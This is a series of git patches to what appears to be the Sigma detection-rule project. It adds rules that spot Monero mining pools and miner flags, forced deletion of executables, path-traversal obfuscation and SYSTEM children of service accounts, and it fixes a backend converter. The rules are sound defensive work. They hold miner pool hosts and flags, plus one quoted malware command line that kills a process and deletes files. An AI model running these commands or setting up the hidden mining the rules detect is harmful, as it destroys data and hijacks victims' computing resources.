'xmr-jp1.nanopool.org' + - 'xmr-au1.nanopool.org' + - 'xmr.2miners.com' + - 'xmr.hashcity.org' + - 'xmr.f2pool.com' + - 'xmrpool.eu' + - 'pool.hashvault.pro' + - 'moneroocean.stream' + - 'monerocean.stream' + condition: selection +falsepositives: + - Legitimate use of crypto miners +level: high diff --git a/rules/linux/process_creation/lnx_crypto_mining.yml b/rules/linux/process_creation/lnx_crypto_mining.yml new file mode 100644 index 00000000..5ff3b1e4 --- /dev/null +++ b/rules/linux/process_creation/lnx_crypto_mining.yml @@ -0,0 +1,36 @@ +title: Linux Crypto Mining Indicators +id: 9069ea3c-b213-4c52-be13-86506a227ab1 +status: experimental +description: Detects command line parameters or strings often used by crypto miners +references: + - https://www.poolwatch.io/coin/monero +date: 2021/10/26 +author: Florian Roth +logsource: + product: linux + category: process_creation +detection: + selection: + CommandLine|contains: + - ' --cpu-priority=' + - '--donate-level=0' + - ' -o pool.' + - ' --nicehash' + - ' --algo=rx/0 ' + - 'stratum+tcp://' + - 'stratum+udp://' + # base64 encoded: --donate-level= + - 'LS1kb25hdGUtbGV2ZWw9' + - '0tZG9uYXRlLWxldmVsP' + - 'tLWRvbmF0ZS1sZXZlbD' + # base64 encoded: stratum+tcp:// and stratum+udp:// + - 'c3RyYXR1bSt0Y3A6Ly' + - 'N0cmF0dW0rdGNwOi8v' + - 'zdHJhdHVtK3RjcDovL' + - 'c3RyYXR1bSt1ZHA6Ly' + - 'N0cmF0dW0rdWRwOi8v' + - 'zdHJhdHVtK3VkcDovL' + condition: selection +falsepositives: + - Legitimate use of crypto miners +level: high diff --git a/rules/windows/network_connection/win_net_crypto_mining.yml b/rules/windows/network_connection/win_net_crypto_mining.yml new file mode 100644 index 00000000..3ec3eb2f --- /dev/null +++ b/rules/windows/network_connection/win_net_crypto_mining.yml @@ -0,0 +1,40 @@ +title: Windows Crypto Mining Pool Connections +id: fa5b1358-b040-4403-9868-15f7d9ab6329 +status: stable +description: Detects process connections to a Monero crypto mining pool +references: + - https://www.poolwatch.io/coin/monero +date: 2021/10/26 +author: Florian Roth +logsource: + category: network_connection + product: windows +detection: + selection: + DestinationHostname: + - 'pool.minexmr.com' + - 'fr.minexmr.com' + - 'de.minexmr.com' + - 'sg.minexmr.com' + - 'ca.minexmr.com' + - 'us-west.minexmr.com' + - 'pool.supportxmr.com' + - 'mine.c3pool.com' + - 'xmr-eu1.nanopool.org' + - 'xmr-eu2.nanopool.org' + - 'xmr-us-east1.nanopool.org' + - 'xmr-us-west1.nanopool.org' + - 'xmr-asia1.nanopool.org' + - 'xmr-jp1.nanopool.org' + - 'xmr-au1.nanopool.org' + - 'xmr.2miners.com' + - 'xmr.hashcity.org' + - 'xmr.f2pool.com' + - 'xmrpool.eu' + - 'pool.hashvault.pro' + - 'moneroocean.stream' + - 'monerocean.stream' + condition: selection +falsepositives: + - Legitimate use of crypto miners +level: high diff --git a/rules/windows/process_creation/win_crypto_mining_monero.yml b/rules/windows/process_creation/win_crypto_mining_monero.yml new file mode 100644 index 00000000..d4bade38 --- /dev/null +++ b/rules/windows/process_creation/win_crypto_mining_monero.yml @@ -0,0 +1,36 @@ +title: Windows Crypto Mining Indicators +id: 66c3b204-9f88-4d0a-a7f7-8a57d521ca55 +description: Detects command line parameters or strings often used by crypto miners +status: stable +references: + - https://www.poolwatch.io/coin/monero +author: Florian Roth +date: 2021/10/26 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains: + - ' --cpu-priority=' + - '--donate-level=0' + - ' -o pool.' + - ' --nicehash' + - ' --algo=rx/0 ' + - 'stratum+tcp://' + - 'stratum+udp://' + # base64 encoded: --donate-level= + - 'LS1kb25hdGUtbGV2ZWw9' + - '0tZG9uYXRlLWxldmVsP' + - 'tLWRvbmF0ZS1sZXZlbD' + # base64 encoded: stratum+tcp:// and stratum+udp:// + - 'c3RyYXR1bSt0Y3A6Ly' + - 'N0cmF0dW0rdGNwOi8v' + - 'zdHJhdHVtK3RjcDovL' + - 'c3RyYXR1bSt1ZHA6Ly' + - 'N0cmF0dW0rdWRwOi8v' + - 'zdHJhdHVtK3VkcDovL' + condition: selection +falsepositives: + - Legitimate use of crypto miners +level: high From ba4bb061c7a280881ca614c7b9fc0fc096c2eae1 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 26 Oct 2021 12:22:18 +0200 Subject: [PATCH 1333/1367] Fix test_duplicate_detections for logsource --- tests/test_rules.py | 23 +++++++++++++---------- 1 file changed, 13 insertions(+), 10 deletions(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index b31c8eab..9a598402 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -184,31 +184,33 @@ class TestRules(unittest.TestCase): self.assertEqual(faulty_detections, [], Fore.RED + "There are rules using '1/all of them' style conditions but only have one condition") - def test_duplicate_titles(self): + def test_duplicate_detections(self): def compare_detections(detection1:dict, detection2:dict) -> bool: - # detections not the same length can't be the same + # detections not the same count can't be the same if len(detection1) != len(detection2): - return False - + return False + for named_condition in detection1: #don't check timeframes if named_condition == "timeframe": continue - + # condition clause must be the same too if named_condition == "condition": if detection1["condition"] != detection2["condition"]: return False else: continue - + # Named condition must exist in both rule files if named_condition not in detection2: return False - + + #can not be the same if len is not equal if len(detection1[named_condition]) != len(detection2[named_condition]): return False + for condition in detection1[named_condition]: if type(condition) != str: @@ -216,10 +218,9 @@ class TestRules(unittest.TestCase): if condition not in detection2[named_condition]: return False - + condition_value1 = detection1[named_condition][condition] condition_value2 = detection2[named_condition][condition] - if condition_value1 != condition_value2: return False @@ -229,9 +230,11 @@ class TestRules(unittest.TestCase): files_and_their_detections = {} for file in self.yield_next_rule_file_path(self.path_to_rules): + print(file) detection = self.get_rule_part(file_path = file, part_name = "detection") logsource = self.get_rule_part(file_path = file, part_name = "logsource") - detection.update(logsource) + detection["logsource"] = {} + detection["logsource"].update(logsource) yaml = self.get_rule_yaml(file_path = file) is_multipart_yaml_file = len(yaml) != 1 From c0a3f7afdd1d94876696cafc3832dc3be4f2fd4e Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 26 Oct 2021 12:25:26 +0200 Subject: [PATCH 1334/1367] Remove my print debug --- tests/test_rules.py | 1 - 1 file changed, 1 deletion(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index 9a598402..58c57fe0 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -230,7 +230,6 @@ class TestRules(unittest.TestCase): files_and_their_detections = {} for file in self.yield_next_rule_file_path(self.path_to_rules): - print(file) detection = self.get_rule_part(file_path = file, part_name = "detection") logsource = self.get_rule_part(file_path = file, part_name = "logsource") detection["logsource"] = {} From 79399db2b833d160453ce53419b8011ac3993382 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 26 Oct 2021 13:17:56 +0200 Subject: [PATCH 1335/1367] add process_creation_susp_del --- .../process_creation_susp_del.yml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 rules/windows/process_creation/process_creation_susp_del.yml diff --git a/rules/windows/process_creation/process_creation_susp_del.yml b/rules/windows/process_creation/process_creation_susp_del.yml new file mode 100644 index 00000000..61f61564 --- /dev/null +++ b/rules/windows/process_creation/process_creation_susp_del.yml @@ -0,0 +1,31 @@ +title: Suspicious Del in CommandLine +id: 204b17ae-4007-471b-917b-b917b315c5db +status: experimental +description: suspicious command line to remove exe or dll +author: frack113 +date: 2021/10/26 +references: + - https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D +tags: + - attack.defense_evasion + - attack.t1070.004 +logsource: + category: process_creation + product: windows +detection: + susp_del_exe: + CommandLine|contains|all: + - 'del ' + - '/f ' + - '/q ' + - '.exe' + susp_del_dll: + CommandLine|contains|all: + - 'del ' + - 'C:\ProgramData\' + - '.dll' + condition: susp_del_exe or susp_del_dll +#cmd.exe (PID: 1044 cmdline: 'C:\Windows\System32\cmd.exe' /c taskkill /im A8D4.exe /f & timeout /t 6 & del /f /q 'C:\Users\user~1\AppData\Local\Temp\A8D4.exe' & del C:\ProgramData\*.dll & exit +falsepositives: + - unknown +level: medium \ No newline at end of file From 1983cba1f33b5e9ecbaee6735629f1de160df425 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 26 Oct 2021 13:24:01 +0200 Subject: [PATCH 1336/1367] refactor: xmrig sub process indicator --- rules/linux/process_creation/lnx_crypto_mining.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/rules/linux/process_creation/lnx_crypto_mining.yml b/rules/linux/process_creation/lnx_crypto_mining.yml index 5ff3b1e4..cc4e2eb2 100644 --- a/rules/linux/process_creation/lnx_crypto_mining.yml +++ b/rules/linux/process_creation/lnx_crypto_mining.yml @@ -19,6 +19,8 @@ detection: - ' --algo=rx/0 ' - 'stratum+tcp://' - 'stratum+udp://' + # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives + - 'sh -c /sbin/modprobe msr allow_writes=on' # base64 encoded: --donate-level= - 'LS1kb25hdGUtbGV2ZWw9' - '0tZG9uYXRlLWxldmVsP' From 3983baf2b02289ec5753700e66d8ae71f38dc2bf Mon Sep 17 00:00:00 2001 From: phantinuss Date: Tue, 26 Oct 2021 16:35:06 +0200 Subject: [PATCH 1337/1367] windows commandline obfuscation --- .../win_commandline_path_obfuscation.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/windows/process_creation/win_commandline_path_obfuscation.yml diff --git a/rules/windows/process_creation/win_commandline_path_obfuscation.yml b/rules/windows/process_creation/win_commandline_path_obfuscation.yml new file mode 100644 index 00000000..70fa5a9d --- /dev/null +++ b/rules/windows/process_creation/win_commandline_path_obfuscation.yml @@ -0,0 +1,29 @@ +title: Command Line Path Obfuscation +status: experimental +id: 1327381e-6ab0-4f38-b583-4c1b8346a56b +author: Christian Burkard +date: 2021/10/26 +description: Detects the attempt to hide or obfuscate the executed command on the CommandLine using bogus path traversal +references: + - https://twitter.com/hexacorn/status/1448037865435320323 + - https://twitter.com/Gal_B1t/status/1062971006078345217 +tags: + - attack.defense_evasion + - attack.t1036 +logsource: + category: process_creation + product: windows +detection: + selection1: + Image|contains: + - '\Windows\' + CommandLine|contains: + - '\..\Windows\' + - '\..\System32\' + - '\..\..\' + selection2: + CommandLine|contains: '.exe\..\' + condition: 1 of them +falsepositives: + - Unknown +level: high From bacdf53236c81a3016b3d85c6469544e3a46a7e9 Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Tue, 26 Oct 2021 15:05:27 +0000 Subject: [PATCH 1338/1367] updating hawk backend to fix or list map missing an outer and operator --- tools/sigma/backends/hawk.py | 131 +++++++++++++++++++++++++++-------- 1 file changed, 101 insertions(+), 30 deletions(-) diff --git a/tools/sigma/backends/hawk.py b/tools/sigma/backends/hawk.py index 54603c11..5fd7a5f0 100644 --- a/tools/sigma/backends/hawk.py +++ b/tools/sigma/backends/hawk.py @@ -126,6 +126,8 @@ class HAWKBackend(SingleTextQueryBackend): return None def generateORNode(self, node): + #retAnd = { "id" : "and", "key": "And", "children" : [ ] } + ret = { "id" : "or", "key": "Or", "children" : [ ] } generated = [ self.generateNode(val) for val in node ] filtered = [ g for g in generated if g is not None ] @@ -133,7 +135,9 @@ class HAWKBackend(SingleTextQueryBackend): if self.sort_condition_lists: filtered = sorted(filtered) ret['children'] = filtered - # return json.dumps(ret)# self.orToken.join(filtered) + + # retAnd['children'].append( ret ) + #return retAnd return ret else: return None @@ -241,8 +245,9 @@ class HAWKBackend(SingleTextQueryBackend): #print(item) nodeRet['args']['str']['value'] = self.generateValueNode(item, True) ret['children'].append( nodeRet ) + retAnd = { "id" : "and", "key": "And", "children" : [ ret ] } + return retAnd # '('+" or ".join(itemslist)+')' # return json.dumps(ret) # '('+" or ".join(itemslist)+')' - return ret # '('+" or ".join(itemslist)+')' def generateMapItemTypedNode(self, fieldname, value, notNode=False): nodeRet = {"key": "", "description": "", "class": "column", "return": "str", "args": { "comparison": { "value": "=" }, "str": { "value": "5" } } } @@ -292,28 +297,72 @@ class HAWKBackend(SingleTextQueryBackend): def generateAggregation(self, agg, timeframe='00'): if agg == None: - return "" + return None + #print(agg.aggfunc) + #print(type(agg.aggfunc)) + #print(agg.aggfunc_notrans) + if not agg.aggfunc_notrans.lower() in ("count", "sum"): + raise NotImplementedError("This aggregation operator '%s' has not been implemented" % agg.aggfunc_notrans) + if agg.aggfunc == sigma.parser.condition.SigmaAggregationParser.AGGFUNC_NEAR: - raise NotImplementedError("The 'near' aggregation operator is not yet implemented for this backend") + return None + if agg.groupfield == None: - s = "SELECT %s(%s) as agg_val from %s where" % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) - s2 = " group by %s having agg_val %s %s" % (self.cleanKey(agg.aggfield), agg.cond_op, agg.condition) - raise NotImplementedError("The 'agg val' aggregation operator is not yet implemented for this backend: %s %s" % (s, s2)) - """ - elif agg.groupfield != None and timeframe == '00': - self.prefixAgg = " SELECT %s(%s) as agg_val from %s where " % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) - self.suffixAgg = " group by %s having agg_val %s %s" % (self.cleanKey(agg.groupfield), agg.cond_op, agg.condition) - return self.prefixAgg, self.suffixAgg + agg.groupfield = "priority" + + if agg.groupfield != None and timeframe == '00': + self.prefixAgg = " SELECT %s(%s) as agg_val from %s where " % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) + self.suffixAgg = " group by %s having agg_val %s %s" % (self.cleanKey(agg.groupfield), agg.cond_op, agg.condition) + #print("Group field and timeframe is 00") + min_count = 60 + nodeRet = {"key": "atomic_counter", "description": self.cleanKey(agg.groupfield) + " %s aggregation stream counter" % agg.aggfunc_notrans, "class": "function", "return": "int", + "inputs": { + "columns" : { "order" : "0", "source" : "columns", "type" : "array", "objectKey" : "columns" }, + "comparison" : { "order" : "1", "source" : "comparison", "type" : "comparison", "objectKey" : "comparison" }, + "threshold" : { "order" : "2", "source" : "", "type" : "int", "objectKey" : "threshold" }, + "limit" : { "order" : "3", "source" : "time_offset", "type" : "int", "objectKey" : "limit" }, + }, + "args": { + "columns" : [ self.cleanKey(agg.groupfield) ], + "comparison": { "value": "%s" % agg.cond_op }, + "threshold": { "value": int(agg.condition) }, + "limit": { "value": min_count } + } + } + nodeRet['rule_id'] = str(uuid.uuid4()) + #print("No time range set") + return nodeRet elif agg.groupfield != None and timeframe != None: for key, duration in self.generateTimeframe(timeframe).items(): - self.prefixAgg = " SELECT %s(%s) as agg_val from %s where " % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) - self.suffixAgg = " group by %s having agg_val %s %s LAST %s %s" % (self.cleanKey(agg.groupfield), agg.cond_op, agg.condition, duration, key) - return self.prefixAgg, self.suffixAgg + min_count = 60 + if key.lower() == 'hours': + min_count = 24 * int(duration) + nodeRet = {"key": "atomic_counter", "description": self.cleanKey(agg.groupfield) + " %s aggregation stream counter" % agg.aggfunc_notrans, "class": "function", "return": "int", + "inputs": { + "columns" : { "order" : "0", "source" : "columns", "type" : "array", "objectKey" : "columns" }, + "comparison" : { "order" : "1", "source" : "comparison", "type" : "comparison", "objectKey" : "comparison" }, + "threshold" : { "order" : "2", "source" : "", "type" : "int", "objectKey" : "threshold" }, + "limit" : { "order" : "3", "source" : "time_offset", "type" : "int", "objectKey" : "limit" }, + }, + "args": { + "columns" : [ self.cleanKey(agg.groupfield) ], + "comparison": { "value": "%s" % agg.cond_op }, + "threshold": { "value": int(agg.condition) }, + "limit": { "value": min_count } + } + } + nodeRet['rule_id'] = str(uuid.uuid4()) + #self.prefixAgg = " SELECT %s(%s) as agg_val from %s where " % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) + #self.suffixAgg = " group by %s having agg_val %s %s LAST %s %s" % (self.cleanKey(agg.groupfield), agg.cond_op, agg.condition, duration, key) + #print("Group field and timeframe") + #return self.prefixAgg, self.suffixAgg + return nodeRet else: self.prefixAgg = " SELECT %s(%s) as agg_val from %s where " % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) self.suffixAgg = " group by %s having agg_val %s %s" % (self.cleanKey(agg.groupfield), agg.cond_op, agg.condition) + #print("Last option") + raise NotImplementedError("The 'agg' aggregation operator is not yet implemented for this backend") return self.prefixAgg, self.suffixAgg - """ #print(agg) raise NotImplementedError("The 'agg' aggregation operator is not yet implemented for this backend") @@ -416,20 +465,42 @@ class HAWKBackend(SingleTextQueryBackend): mapped = None pass - #if parsed.parsedAgg: #and timeframe == None: - # (prefix, suffixAgg) = self.generateAggregation(parsed.parsedAgg) - # result = prefix + result - # result += suffixAgg - #elif parsed.parsedAgg != None and timeframe != None: - # (prefix, suffixAgg) = self.generateAggregation(parsed.parsedAgg, timeframe) - # result = prefix + result - # result += suffixAgg - #else: - # result = prefix + result + try: + timeframe = sigmaparser.parsedyaml['detection']['timeframe'] + except: + timeframe = None + + if parsed.parsedAgg and timeframe == None: + addition = self.generateAggregation(parsed.parsedAgg) + #print(addition) + #print(result) + if addition: + if not 'children' in result: + rec = self.subExpression % json.dumps(result) + result = json.loads(rec) + #print(result) + result['children'].append(addition) + elif parsed.parsedAgg: + #print(result) + raise Exception("No agg returned, something is off") + elif parsed.parsedAgg != None and timeframe != None: + addition = self.generateAggregation(parsed.parsedAgg, timeframe) + #print(addition) + #print(result) + if addition: + #print(result) + if not 'children' in result: + rec = self.subExpression % json.dumps(result) + result = json.loads(rec) + #print(result) + result['children'].append(addition) + elif parsed.parsedAgg: + #print(result) + raise Exception("No agg returned, something is off") + else: + # result = prefix + result + pass - #print(result) - #print("Prefix: ", prefix) - # result = prefix + json.dumps(result) result = json.dumps(result) analytic_txt = ret + result + ret2 # json.dumps(ret) @@ -473,7 +544,7 @@ class HAWKBackend(SingleTextQueryBackend): "hawk_id" : sigmaparser.parsedyaml['id'] } if 'tags' in sigmaparser.parsedyaml: - record["tags"] = sigmaparser.parsedyaml['tags'] + record["tags"] = [ item.replace("attack.", "") for item in sigmaparser.parsedyaml['tags']] if not 'status' in self.sigmaparser.parsedyaml or 'status' in self.sigmaparser.parsedyaml and self.sigmaparser.parsedyaml['status'] != 'experimental': record['correlation_action'] += 10.0; From 22b64644ef5efc072b554958f5a079712a39833a Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Tue, 26 Oct 2021 15:09:47 +0000 Subject: [PATCH 1339/1367] updating hawk backend to fix open ended backslash for regex --- tools/sigma/backends/hawk.py | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/tools/sigma/backends/hawk.py b/tools/sigma/backends/hawk.py index 5fd7a5f0..12c2d9d5 100644 --- a/tools/sigma/backends/hawk.py +++ b/tools/sigma/backends/hawk.py @@ -182,6 +182,7 @@ class HAWKBackend(SingleTextQueryBackend): elif type(value) == str and "*" in value: # value = value.replace("*", ".*") value = value.replace("*", "") + value = value.replace("\\", "\\\\") if notNode: nodeRet["args"]["comparison"]["value"] = "!regex" else: @@ -231,6 +232,7 @@ class HAWKBackend(SingleTextQueryBackend): ret['children'].append( nodeRet ) elif type(item) == str and "*" in item: item = item.replace("*", "") + item = value.replace("\\", "\\\\") # item = item.replace("*", ".*") #print("item") #print(item) @@ -265,7 +267,7 @@ class HAWKBackend(SingleTextQueryBackend): return "%s imatches %s" % (self.cleanKey(fieldname), self.generateValueNode(regex, True)) """ #print("ENDS WITH!!!") - nodeRet['args']['str']['value'] = self.generateValueNode(regex, True) + nodeRet['args']['str']['value'] = self.generateValueNode(regex, True).replace("\\", "\\\\") if notNode: nodeRet["args"]["comparison"]["value"] = "!regex" else: From 0d65dcdc281ca3260a5eece306f8fd9de0bf1c47 Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Tue, 26 Oct 2021 15:12:03 +0000 Subject: [PATCH 1340/1367] fixx err --- tools/sigma/backends/hawk.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/backends/hawk.py b/tools/sigma/backends/hawk.py index 12c2d9d5..a65837e7 100644 --- a/tools/sigma/backends/hawk.py +++ b/tools/sigma/backends/hawk.py @@ -232,7 +232,7 @@ class HAWKBackend(SingleTextQueryBackend): ret['children'].append( nodeRet ) elif type(item) == str and "*" in item: item = item.replace("*", "") - item = value.replace("\\", "\\\\") + item = item.replace("\\", "\\\\") # item = item.replace("*", ".*") #print("item") #print(item) From 7fc2a6f00d286b50833fae5c138a4ddce4e9349b Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Tue, 26 Oct 2021 15:25:11 +0000 Subject: [PATCH 1341/1367] missed one --- tools/sigma/backends/hawk.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/backends/hawk.py b/tools/sigma/backends/hawk.py index a65837e7..7147ff37 100644 --- a/tools/sigma/backends/hawk.py +++ b/tools/sigma/backends/hawk.py @@ -94,7 +94,7 @@ class HAWKBackend(SingleTextQueryBackend): # they imply the entire payload nodeRet['description'] = key nodeRet['rule_id'] = str(uuid.uuid4()) - nodeRet['args']['str']['value'] = self.generateValueNode(node, False) + nodeRet['args']['str']['value'] = self.generateValueNode(node, False).replace("\\","\\\\") # return json.dumps(nodeRet) return nodeRet elif type(node) == list: From 893874d3a5c30120881cfa277bebd333758c8664 Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Tue, 26 Oct 2021 16:25:50 +0000 Subject: [PATCH 1342/1367] removing item with space, and removing duplicate item and fixing target field, thx to frack113 --- tools/config/hawk.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/tools/config/hawk.yml b/tools/config/hawk.yml index 2b1f8f6f..0bbc0a23 100644 --- a/tools/config/hawk.yml +++ b/tools/config/hawk.yml @@ -148,7 +148,6 @@ fieldmappings: Application: image ProcessName: image TargetImage: target_image - Parent Image: parent_image ParentImage: parent_image Caller Process Name: parent_image CallerProcessName: parent_image @@ -171,7 +170,6 @@ fieldmappings: ServiceName: service_name Service: service_name ServiceFileName: filename - TargetObject: target_object EventID: vendor_id SourceImage: parent_image Description: image_description @@ -192,7 +190,7 @@ fieldmappings: Signed: signature Status: value TargetFilename: filename - TargetObject: object + TargetObject: object_target ObjectClass: object_type ObjectValueName: object_name ObjectName: object_name From 8f22d418f3cfa97e9742b8f1b73878ce0751050d Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Tue, 26 Oct 2021 16:28:04 +0000 Subject: [PATCH 1343/1367] fixing lingering item --- tools/config/hawk.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/tools/config/hawk.yml b/tools/config/hawk.yml index 0bbc0a23..a9e7b9e0 100644 --- a/tools/config/hawk.yml +++ b/tools/config/hawk.yml @@ -149,7 +149,6 @@ fieldmappings: ProcessName: image TargetImage: target_image ParentImage: parent_image - Caller Process Name: parent_image CallerProcessName: parent_image ParentProcessName: parent_image CommandLine: command From 6ce82ab780d1845ef0af5962fbaad30de260431a Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 26 Oct 2021 19:37:22 +0200 Subject: [PATCH 1344/1367] Add athena coverage --- Makefile | 1 + 1 file changed, 1 insertion(+) diff --git a/Makefile b/Makefile index e8390afd..7388a0d2 100644 --- a/Makefile +++ b/Makefile @@ -52,6 +52,7 @@ test-sigmac: $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t lacework rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t mdatp rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t uberagent rules/ > /dev/null + $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t athena -c tools/config/athena.yml rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t ala rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t ala-rule rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t ala --backend-config tests/backend_config.yml rules/windows/process_creation/ > /dev/null From 9b6be31c8d9b6b69c7f88ae3a71fd24749f36252 Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Tue, 26 Oct 2021 18:25:23 +0000 Subject: [PATCH 1345/1367] commenting out exceptions output from handling --- tools/sigma/sigmac.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 6a153a6f..167ae7af 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -368,7 +368,7 @@ def main(): sys.exit(error) except (NotImplementedError, TypeError) as e: print("An unsupported feature is required for this Sigma rule (%s): " % (sigmafile) + str(e), file=sys.stderr) - traceback.print_exc() + # traceback.print_exc() logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile)) success = False if not cmdargs.ignore_backend_errors: From 860b4b2bb99b71b9de79998d9c96dc8ba82546ec Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Tue, 26 Oct 2021 20:26:29 +0000 Subject: [PATCH 1346/1367] adding hawk to makefile fore coverage --- Makefile | 1 + 1 file changed, 1 insertion(+) diff --git a/Makefile b/Makefile index e8390afd..3b48f32a 100644 --- a/Makefile +++ b/Makefile @@ -99,6 +99,7 @@ test-sigmac: $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -c tools/config/filebeat-defaultindex.yml -t xpack-watcher rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -c tools/config/splunk-windows.yml -t splunk rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -c tools/config/generic/sysmon.yml -c tools/config/splunk-windows.yml -t splunk rules/ > /dev/null + $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -c tools/config/hawk.yml -t hawk rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t grep rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t fieldlist rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t xpack-watcher -c tools/config/winlogbeat.yml -O output=plain -O es=es -O foobar rules/windows/builtin/win_susp_failed_logons_single_source.yml > /dev/null From 5aac1b6879ac43d279dc953f5e26a3d11086275e Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Wed, 27 Oct 2021 01:04:24 -0400 Subject: [PATCH 1347/1367] Unsupported rule now possible with Sysmonv13.30 --- .../win_susp_child_process_as_system_.yml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 rules/windows/process_creation/win_susp_child_process_as_system_.yml diff --git a/rules/windows/process_creation/win_susp_child_process_as_system_.yml b/rules/windows/process_creation/win_susp_child_process_as_system_.yml new file mode 100644 index 00000000..2b867d67 --- /dev/null +++ b/rules/windows/process_creation/win_susp_child_process_as_system_.yml @@ -0,0 +1,33 @@ +title: Suspicious Child Process Created as System +id: 590a5f4c-6c8c-4f10-8307-89afe9453a9d +description: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts +references: + - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment + - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ + - https://github.com/antonioCoco/RogueWinRM + - https://twitter.com/Cyb3rWard0g/status/1453123054243024897 +tags: + - attack.privilege_escalation + - attack.t1134 # an old one + - attack.t1134.002 +status: experimental +author: Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR) +date: 2019/10/26 +modified: 2020/10/26 +logsource: + category: process_creation + product: windows +detection: + selection: + ParentUser: + - 'NT AUTHORITY\NETWORK SERVICE' + - 'NT AUTHORITY\LOCAL SERVICE' + - 'AUTORITE NT\Sys' # French language settings + User: 'NT AUTHORITY\SYSTEM' + rundllexception: + Image|endswith: '\rundll32.exe' + CommandLine|contains: 'DavSetCookie' + condition: selection and not rundllexception +falsepositives: + - Unknown +level: high \ No newline at end of file From 9c7a736ca69afd234bbbe9af02c5ec6b18644bc6 Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Wed, 27 Oct 2021 01:06:37 -0400 Subject: [PATCH 1348/1367] added integrity level for user --- .../process_creation/win_susp_child_process_as_system_.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/process_creation/win_susp_child_process_as_system_.yml b/rules/windows/process_creation/win_susp_child_process_as_system_.yml index 2b867d67..d7a31c2b 100644 --- a/rules/windows/process_creation/win_susp_child_process_as_system_.yml +++ b/rules/windows/process_creation/win_susp_child_process_as_system_.yml @@ -24,6 +24,7 @@ detection: - 'NT AUTHORITY\LOCAL SERVICE' - 'AUTORITE NT\Sys' # French language settings User: 'NT AUTHORITY\SYSTEM' + IntegrityLevel: 'System' rundllexception: Image|endswith: '\rundll32.exe' CommandLine|contains: 'DavSetCookie' From d80f73625fcdcd9d5aad8805572b4b261210070a Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Wed, 27 Oct 2021 01:22:19 -0400 Subject: [PATCH 1349/1367] Added the right System string to User filter --- .../process_creation/win_susp_child_process_as_system_.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_child_process_as_system_.yml b/rules/windows/process_creation/win_susp_child_process_as_system_.yml index d7a31c2b..241bcc8e 100644 --- a/rules/windows/process_creation/win_susp_child_process_as_system_.yml +++ b/rules/windows/process_creation/win_susp_child_process_as_system_.yml @@ -22,8 +22,9 @@ detection: 